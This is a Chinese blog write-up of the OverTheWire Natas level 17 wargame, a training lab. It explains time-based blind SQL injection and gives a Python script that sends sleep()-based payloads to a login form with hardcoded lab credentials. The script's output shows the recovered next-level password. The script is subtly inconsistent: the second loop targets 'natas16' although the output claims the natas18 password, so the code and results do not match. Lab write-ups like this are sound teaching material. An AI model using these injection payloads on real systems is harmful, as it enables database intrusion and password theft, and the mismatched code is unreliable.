标签:php org index lte 存在 python pre 问题 break
进入页面后,让我们去输入一个用户名看它是否存在。这与第15关很相似,但是不同的是这题关闭了回显。显然,关闭了回显后我们还是能有办法知道对应的sql语句到底执行成功还是失败,这有个技巧叫盲注(Blind injection),通过调用sleep()并且判断请求的时间来实现。
代码如下
import requests
target = ‘http://natas17.natas.labs.overthewire.org/index.php‘
chars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890‘
filtered = ‘‘
passwd = ‘‘
for char in chars:
payload = {‘username‘: f‘natas18" and password like binary "%{char}%" and sleep(2)#‘}
resp = requests.post(target, auth=(‘natas17‘, ‘8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw‘), data=payload)
if resp.elapsed.seconds >= 2:
filtered += char
print(filtered)
for _ in range(32):
for char in filtered:
payload = {‘username‘: f‘natas16" and password like binary "{passwd + char}%" and sleep(2)#‘}
resp = requests.post(target, auth=(‘natas17‘, ‘8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw‘), data=payload)
if resp.elapsed.seconds >= 2:
passwd += char
print(passwd)
break
类似的,先通过filtered把可能的字符集先找出来,然后再慢慢暴力出结果。
代码运行过程如下
d
dg
dgh
dghj
dghjl
dghjlm
dghjlmp
dghjlmpq
dghjlmpqs
dghjlmpqsv
dghjlmpqsvw
dghjlmpqsvwx
dghjlmpqsvwxy
dghjlmpqsvwxyC
dghjlmpqsvwxyCD
dghjlmpqsvwxyCDF
dghjlmpqsvwxyCDFI
dghjlmpqsvwxyCDFIK
dghjlmpqsvwxyCDFIKO
dghjlmpqsvwxyCDFIKOP
dghjlmpqsvwxyCDFIKOPR
dghjlmpqsvwxyCDFIKOPR4
dghjlmpqsvwxyCDFIKOPR47
dghjlmpqsvwxyCDFIKOPR470
x
xv
xvK
xvKI
xvKIq
xvKIqD
xvKIqDj
xvKIqDjy
xvKIqDjy4
xvKIqDjy4O
xvKIqDjy4OP
xvKIqDjy4OPv
xvKIqDjy4OPv7
xvKIqDjy4OPv7w
xvKIqDjy4OPv7wC
xvKIqDjy4OPv7wCR
xvKIqDjy4OPv7wCRg
xvKIqDjy4OPv7wCRgD
xvKIqDjy4OPv7wCRgDl
xvKIqDjy4OPv7wCRgDlm
xvKIqDjy4OPv7wCRgDlmj
xvKIqDjy4OPv7wCRgDlmj0
xvKIqDjy4OPv7wCRgDlmj0p
xvKIqDjy4OPv7wCRgDlmj0pF
xvKIqDjy4OPv7wCRgDlmj0pFs
xvKIqDjy4OPv7wCRgDlmj0pFsC
xvKIqDjy4OPv7wCRgDlmj0pFsCs
xvKIqDjy4OPv7wCRgDlmj0pFsCsD
xvKIqDjy4OPv7wCRgDlmj0pFsCsDj
xvKIqDjy4OPv7wCRgDlmj0pFsCsDjh
xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhd
xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
第18关的密码为xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP,另外这个代码需要在好一点的网下运行,不然网络本身延迟导致出问题就很尴尬了...
标签:php org index lte 存在 python pre 问题 break
原文地址:https://www.cnblogs.com/wudiiv11/p/natas17.html
